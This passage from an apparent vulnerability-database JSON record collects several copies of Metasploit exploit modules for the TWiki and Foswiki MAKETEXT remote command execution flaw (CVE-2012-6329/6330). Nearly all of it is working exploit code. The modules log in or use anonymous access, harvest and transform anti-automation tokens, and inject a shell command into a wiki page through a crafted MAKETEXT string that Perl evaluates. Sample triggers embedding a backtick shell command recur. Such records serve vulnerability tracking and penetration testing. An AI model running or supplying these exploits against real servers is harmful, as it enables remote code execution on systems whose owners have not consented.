\nif not res or res.code != 200 or res.body !~ /HASH/ \nfail_with(Exploit::Failure::Unknown, \"Error executing the payload\") \nend \n \nprint_good(\"Exploitation was successful\") \n \nend \n \nend \n \n=begin \n \n* Trigger: \n \n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}% \n \n=end`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119054/twiki_maketext.rb.txt"}, {"lastseen": "2016-12-05T22:12:57", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "Foswiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119055", "href": 
"https://packetstormsecurity.com/files/119055/Foswiki-MAKETEXT-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Foswiki MAKETEXT Remote Command Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the MAKETEXT Foswiki variable. By using \na specially crafted MAKETEXT, a malicious user can execute shell commands since the \ninput is passed to the Perl \"eval\" command without first being sanitized. The \nproblem is caused by an underlying security issue in the CPAN:Locale::Maketext \nmodule. Only Foswiki sites that have user interface localization enabled \n(UserInterfaceInternationalisation variable set) are vulnerable. \n \nIf USERNAME and PASSWORD aren't provided, anonymous access will be tried. \nAlso, if the FoswikiPage option isn't provided, the module will try to create a \nrandom page on the SandBox space. The module has been tested successfully on \nFoswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image. 
\n}, \n'Author' => \n[ \n'Brian Carlson', # original discovery in Perl Locale::Maketext \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2012-6329' ], \n[ 'OSVDB', '88410' ], \n[ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ] \n], \n'Privileged' => false, # web server context \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 1024, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic ruby python bash telnet' \n} \n}, \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Foswiki 1.1.5', { }]], \n'DisclosureDate' => 'Dec 03 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"Foswiki base path\", \"/\" ]), \nOptString.new('FoswikiPage', [ false, \"Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]), \nOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]), \nOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ]) \n], self.class) \nend \n \ndef do_login(username, password) \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}bin/login\", \n'vars_post' => \n{ \n'username' => username, \n'password' => password \n} \n}) \n \nif not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ \nvprint_status \"#{res.code}\\n#{res.body}\" \nreturn nil \nend \n \nsession = $1 \nreturn session \nend \n \ndef inject_code(session, code) \n \nvprint_status(\"Retrieving the validation_key...\") \n \nres = send_request_cgi({ \n'uri' => \"#{@base}bin/edit#{@page}\", \n'cookie' => \"FOSWIKISID=#{session}\" \n}) \n \nif not res or res.code != 200 or res.body !~ /name='validation_key' value='\\?([0-9a-f]*)'/ \nvprint_error(\"Error retrieving the validation_key\") \nreturn nil \nend \n \nvalidation_key = $1 
\nvprint_good(\"validation_key found: #{validation_key}\") \n \nif session.empty? \nif res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ \nsession = $1 \nelse \nvprint_error(\"Error using anonymous access\") \nreturn nil \nend \nend \n \nif res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ \nstrike_one = $1 \nelse \nvprint_error(\"Error getting the FOSWIKISTRIKEONE value\") \nreturn nil \nend \n \n# Transforming validation_key in order to bypass foswiki antiautomation \nvalidation_key = Rex::Text.md5(validation_key + strike_one) \nvprint_status(\"Transformed validation key: #{validation_key}\") \nvprint_status(\"Injecting the payload...\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}bin/save#{@page}\", \n'cookie' => \"FOSWIKISID=#{session}\", \n'vars_post' => \n{ \n'validation_key' => validation_key, \n'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\" \n} \n \n}) \n \nif not res or res.code != 302 or res.headers['Location'] !~ /bin\\/view#{@page}/ \nprint_warning(\"Error injecting the payload\") \nprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\" \nreturn nil \nend \n \nlocation = URI(res.headers['Location']).path \nprint_good(\"Payload injected on #{location}\") \n \nreturn location \nend \n \ndef check \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \nres = send_request_cgi({ \n'uri' => \"#{@base}System/WebHome\" \n}) \n \nif not res or res.code != 200 \nreturn Exploit::CheckCode::Unknown \nend \n \nif res.body =~ /This site is running Foswiki version.*Foswiki-(\\d\\.\\d\\.\\d)/ \nversion = $1 \nprint_status(\"Version found: #{version}\") \nif version <= \"1.1.6\" \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \nreturn Exploit::CheckCode::Detected \nend \n \n \ndef exploit \n \n# 
Init variables \n@page = '' \n \nif datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty? \n@page << '/' if datastore['FoswikiPage'][0] != '/' \n@page << datastore['FoswikiPage'] \nelse \n@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\" \nend \n \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \n# Login if needed \nif (datastore['USERNAME'] and \nnot datastore['USERNAME'].empty? and \ndatastore['PASSWORD'] and \nnot datastore['PASSWORD'].empty?) \nprint_status(\"Trying login to get session ID...\") \nsession = do_login(datastore['USERNAME'], datastore['PASSWORD']) \nelse \nprint_status(\"Using anonymous access...\") \nsession = \"\" \nend \n \nif not session \nfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\") \nend \n \n# Inject payload \nprint_status(\"Trying to inject the payload on #{@page}...\") \nres = inject_code(session, payload.encoded) \nif not res or res !~ /#{@page}/ \nfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\") \nend \n \n# Execute payload \nprint_status(\"Executing the payload through #{@page}...\") \nres = send_request_cgi({ \n'uri' => \"#{@base}#{@page}\", \n'cookie' => \"FOSWIKISID=#{session}\" \n}) \nif not res or res.code != 200 or res.body !~ /HASH/ \nprint_status(\"#{res.code}\\n#{res.body}\") \nfail_with(Exploit::Failure::Unknown, \"Error executing the payload\") \nend \n \nprint_good(\"Exploitation was successful\") \n \nend \n \nend \n \n=begin \n \n* Trigger: \n \n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}% \n \n=end \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119055/foswiki_maketext.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T17:47:37", "description": "No description provided by source.", "published": "2012-12-25T00:00:00", "title": "TWiki MAKETEXT Remote 
Command Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60534", "id": "SSV:60534", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'TWiki MAKETEXT Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\r\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\r\n input is passed to the Perl "eval" command without first being sanitized. The\r\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\r\n module. This works in TWiki sites that have user interface localization enabled\r\n (UserInterfaceInternationalisation variable set).\r\n \r\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\r\n if the 'TwikiPage' option isn't provided, the module will try to create a random\r\n page on the SandBox space. 
The modules has been tested successfully on\r\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\r\n },\r\n 'Author' =>\r\n [\r\n 'George Clark', # original discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-6329' ],\r\n [ 'OSVDB', '88460' ],\r\n [ 'BID', '56950' ],\r\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\r\n ],\r\n 'Privileged' => false, # web server context\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 1024,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic ruby python bash telnet'\r\n }\r\n },\r\n 'Platform' => [ 'unix' ],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [[ 'Automatic', { }]],\r\n 'DisclosureDate' => 'Dec 15 2012',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]),\r\n OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),\r\n OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),\r\n OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])\r\n ], self.class)\r\n end\r\n \r\n def do_login(username, password)\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => "#{@base}do/login",\r\n 'vars_post' =>\r\n {\r\n 'username' => username,\r\n 'password' => password\r\n }\r\n })\r\n \r\n if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/\r\n return nil\r\n end\r\n \r\n session = $1\r\n return session\r\n end\r\n \r\n def inject_code(session, code)\r\n \r\n vprint_status("Retrieving the crypttoken...")\r\n \r\n res = send_request_cgi({\r\n 'uri' => "#{@base}do/edit#{@page}",\r\n 'cookie' => "TWIKISID=#{session}",\r\n 'vars_get' =>\r\n {\r\n 
'nowysiwyg' => '1'\r\n }\r\n })\r\n \r\n if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/\r\n vprint_error("Error retrieving the crypttoken")\r\n return nil\r\n end\r\n \r\n crypttoken = $1\r\n vprint_good("crypttoken found: #{crypttoken}")\r\n \r\n if session.empty?\r\n if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/\r\n session = $1\r\n else\r\n vprint_error("Error using anonymous access")\r\n return nil\r\n end\r\n end\r\n \r\n vprint_status("Injecting the payload...")\r\n \r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => "#{@base}do/save#{@page}",\r\n 'cookie' => "TWIKISID=#{session}",\r\n 'vars_post' =>\r\n {\r\n 'crypttoken' => crypttoken,\r\n 'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\" args=\\"#{rand_text_alpha(3 + rand(3))}\\"}%"\r\n }\r\n })\r\n \r\n if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\r\n print_warning("Error injecting the payload")\r\n print_status "#{res.code}\\n#{res.body}\\n#{res.headers['Location']}"\r\n return nil\r\n end\r\n \r\n location = URI(res.headers['Location']).path\r\n print_good("Payload injected on #{location}")\r\n \r\n return location\r\n end\r\n \r\n def check\r\n @base = target_uri.path\r\n @base << '/' if @base[-1, 1] != '/'\r\n \r\n res = send_request_cgi({\r\n 'uri' => "#{@base}do/view/TWiki/WebHome"\r\n })\r\n \r\n if not res or res.code != 200\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n if res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\r\n version = $1\r\n print_status("Version found: #{version}")\r\n if version < "5.1.3"\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n return Exploit::CheckCode::Detected\r\n end\r\n \r\n \r\n def exploit\r\n \r\n # Init variables\r\n @page = ''\r\n \r\n if 
datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\r\n @page << '/' if datastore['TwikiPage'][0] != '/'\r\n @page << datastore['TwikiPage']\r\n else\r\n @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}"\r\n end\r\n \r\n @base = target_uri.path\r\n @base << '/' if @base[-1, 1] != '/'\r\n \r\n # Login if needed\r\n if (datastore['USERNAME'] and\r\n not datastore['USERNAME'].empty? and\r\n datastore['PASSWORD'] and\r\n not datastore['PASSWORD'].empty?)\r\n print_status("Trying login to get session ID...")\r\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n else\r\n print_status("Using anonymous access...")\r\n session = ""\r\n end\r\n \r\n if not session\r\n fail_with(Exploit::Failure::Unknown, "Error getting a session ID")\r\n end\r\n \r\n # Inject payload\r\n print_status("Trying to inject the payload on #{@page}...")\r\n res = inject_code(session, payload.encoded)\r\n if not res\r\n fail_with(Exploit::Failure::Unknown, "Error injecting the payload")\r\n end\r\n \r\n # Execute payload\r\n print_status("Executing the payload through #{res}...")\r\n res = send_request_cgi({\r\n 'uri' => res,\r\n 'cookie' => "TWIKISID=#{session}"\r\n })\r\n if not res or res.code != 200 or res.body !~ /HASH/\r\n fail_with(Exploit::Failure::Unknown, "Error executing the payload")\r\n end\r\n \r\n print_good("Exploitation was successful")\r\n \r\n end\r\n \r\nend\r\n \r\n=begin\r\n \r\n* Trigger:\r\n \r\n%MAKETEXT{"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%\r\n \r\n=end\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60534"}], "metasploit": [{"lastseen": "2020-10-12T23:26:48", "description": "This module exploits a vulnerability in the MAKETEXT Twiki variable. 
By using a specially crafted MAKETEXT, a malicious user can execute shell commands since user input is passed to the Perl \"eval\" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. This works in TWiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set). If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the 'TwikiPage' option isn't provided, the module will try to create a random page on the SandBox space. The module has been tested successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\n", "published": "2012-12-21T10:30:04", "type": "metasploit", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TWiki MAKETEXT Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. This works in TWiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set).\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. 
Also,\n if the 'TwikiPage' option isn't provided, the module will try to create a random\n page on the SandBox space. The module has been tested successfully on\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\n },\n 'Author' =>\n [\n 'George Clark', # original discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-6329' ],\n [ 'OSVDB', '88460' ],\n [ 'BID', '56950' ],\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 1024,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic ruby python telnet'\n }\n },\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => '2012-12-15',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]),\n OptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\n OptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\n OptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\n ])\n end\n\n def post_auth?\n true\n end\n\n def do_login(username, password)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}do/login\",\n 'vars_post' =>\n {\n 'username' => username,\n 'password' => password\n }\n })\n\n if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/\n return nil\n end\n\n session = $1\n return session\n end\n\n def inject_code(session, code)\n\n vprint_status(\"Retrieving the crypttoken...\")\n\n res = send_request_cgi({\n 'uri' => \"#{@base}do/edit#{@page}\",\n 'cookie' => \"TWIKISID=#{session}\",\n 'vars_get' =>\n {\n 'nowysiwyg' 
=> '1'\n }\n })\n\n if not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/\n vprint_error(\"Error retrieving the crypttoken\")\n return nil\n end\n\n crypttoken = $1\n vprint_good(\"crypttoken found: #{crypttoken}\")\n\n if session.empty?\n if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/\n session = $1\n else\n vprint_error(\"Error using anonymous access\")\n return nil\n end\n end\n\n vprint_status(\"Injecting the payload...\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}do/save#{@page}\",\n 'cookie' => \"TWIKISID=#{session}\",\n 'vars_post' =>\n {\n 'crypttoken' => crypttoken,\n 'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\n }\n })\n\n if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\n print_warning(\"Error injecting the payload\")\n print_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\n return nil\n end\n\n location = URI(res.headers['Location']).path\n print_good(\"Payload injected on #{location}\")\n\n return location\n end\n\n def check\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => \"#{@base}do/view/TWiki/WebHome\"\n })\n\n if not res or res.code != 200\n return Exploit::CheckCode::Unknown\n end\n\n if res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\n version = $1\n vprint_status(\"Version found: #{version}\")\n if version < \"5.1.3\"\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n\n # Init variables\n @page = ''\n\n if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\n @page << '/' if datastore['TwikiPage'][0] != '/'\n @page << datastore['TwikiPage']\n else\n @page 
<< \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\n end\n\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n # Login if needed\n if (datastore['USERNAME'] and\n not datastore['USERNAME'].empty? and\n datastore['PASSWORD'] and\n not datastore['PASSWORD'].empty?)\n print_status(\"Trying login to get session ID...\")\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\n else\n print_status(\"Using anonymous access...\")\n session = \"\"\n end\n\n if not session\n fail_with(Failure::Unknown, \"Error getting a session ID\")\n end\n\n # Inject payload\n print_status(\"Trying to inject the payload on #{@page}...\")\n res = inject_code(session, payload.encoded)\n if not res\n fail_with(Failure::Unknown, \"Error injecting the payload\")\n end\n\n # Execute payload\n print_status(\"Executing the payload through #{res}...\")\n res = send_request_cgi({\n 'uri' => res,\n 'cookie' => \"TWIKISID=#{session}\"\n })\n if not res or res.code != 200 or res.body !~ /HASH/\n fail_with(Failure::Unknown, \"Error executing the payload\")\n end\n\n print_good(\"Exploitation was successful\")\n\n end\nend\n\n=begin\n\n* Trigger:\n\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\n\n=end\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/twiki_maketext.rb"}, {"lastseen": "2020-10-12T23:25:07", "description": "This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since the input is passed to the Perl \"eval\" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. Only Foswiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set) are vulnerable. 
If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the FoswikiPage option isn't provided, the module will try to create a random page on the SandBox space. The modules has been tested successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.\n", "published": "2012-12-21T21:08:08", "type": "metasploit", "title": "Foswiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329", "CVE-2012-6330"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/FOSWIKI_MAKETEXT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Foswiki MAKETEXT Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using\n a specially crafted MAKETEXT, a malicious user can execute shell commands since the\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. Only Foswiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set) are vulnerable.\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried.\n Also, if the FoswikiPage option isn't provided, the module will try to create a\n random page on the SandBox space. 
The modules has been tested successfully on\n Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.\n },\n 'Author' =>\n [\n 'Brian Carlson', # original discovery in Perl Locale::Maketext\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-6329' ],\n [ 'OSVDB', '88410' ],\n [ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ]\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 1024,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic ruby python telnet'\n }\n },\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Foswiki 1.1.5', { }]],\n 'DisclosureDate' => '2012-12-03',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Foswiki base path\", \"/\" ]),\n OptString.new('FoswikiPage', [ false, \"Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\n OptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\n OptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\n ])\n end\n\n def post_auth?\n true\n end\n\n def default_cred?\n true\n end\n\n def do_login(username, password)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}bin/login\",\n 'vars_post' =>\n {\n 'username' => username,\n 'password' => password\n }\n })\n\n if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/\n vprint_status \"#{res.code}\\n#{res.body}\"\n return nil\n end\n\n session = $1\n return session\n end\n\n def inject_code(session, code)\n\n vprint_status(\"Retrieving the validation_key...\")\n\n res = send_request_cgi({\n 'uri' => \"#{@base}bin/edit#{@page}\",\n 'cookie' => \"FOSWIKISID=#{session}\"\n })\n\n if not res or res.code != 200 or res.body !~ 
/name='validation_key' value='\\?([0-9a-f]*)'/\n vprint_error(\"Error retrieving the validation_key\")\n return nil\n end\n\n validation_key = $1\n vprint_good(\"validation_key found: #{validation_key}\")\n\n if session.empty?\n if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/\n session = $1\n else\n vprint_error(\"Error using anonymous access\")\n return nil\n end\n end\n\n if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/\n strike_one = $1\n else\n vprint_error(\"Error getting the FOSWIKISTRIKEONE value\")\n return nil\n end\n\n # Transforming validation_key in order to bypass foswiki antiautomation\n validation_key = Rex::Text.md5(validation_key + strike_one)\n vprint_status(\"Transformed validation key: #{validation_key}\")\n vprint_status(\"Injecting the payload...\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}bin/save#{@page}\",\n 'cookie' => \"FOSWIKISID=#{session}\",\n 'vars_post' =>\n {\n 'validation_key' => validation_key,\n 'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\n }\n\n })\n\n if not res or res.code != 302 or res.headers['Location'] !~ /bin\\/view#{@page}/\n print_warning(\"Error injecting the payload\")\n print_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\n return nil\n end\n\n location = URI(res.headers['Location']).path\n print_good(\"Payload injected on #{location}\")\n\n return location\n end\n\n def check\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => \"#{@base}System/WebHome\"\n })\n\n if not res or res.code != 200\n return Exploit::CheckCode::Unknown\n end\n\n if res.body =~ /This site is running Foswiki version.*Foswiki-(\\d\\.\\d\\.\\d)/\n version = $1\n print_status(\"Version found: #{version}\")\n if version <= \"1.1.6\"\n return Exploit::CheckCode::Appears\n else\n return 
Exploit::CheckCode::Detected\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n\n # Init variables\n @page = ''\n\n if datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty?\n @page << '/' if datastore['FoswikiPage'][0] != '/'\n @page << datastore['FoswikiPage']\n else\n @page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\n end\n\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n # Login if needed\n if (datastore['USERNAME'] and\n not datastore['USERNAME'].empty? and\n datastore['PASSWORD'] and\n not datastore['PASSWORD'].empty?)\n print_status(\"Trying login to get session ID...\")\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\n else\n print_status(\"Using anonymous access...\")\n session = \"\"\n end\n\n if not session\n fail_with(Failure::Unknown, \"Error getting a session ID\")\n end\n\n # Inject payload\n print_status(\"Trying to inject the payload on #{@page}...\")\n res = inject_code(session, payload.encoded)\n if not res or res !~ /#{@page}/\n fail_with(Failure::Unknown, \"Error injecting the payload\")\n end\n\n # Execute payload\n print_status(\"Executing the payload through #{@page}...\")\n res = send_request_cgi({\n 'uri' => 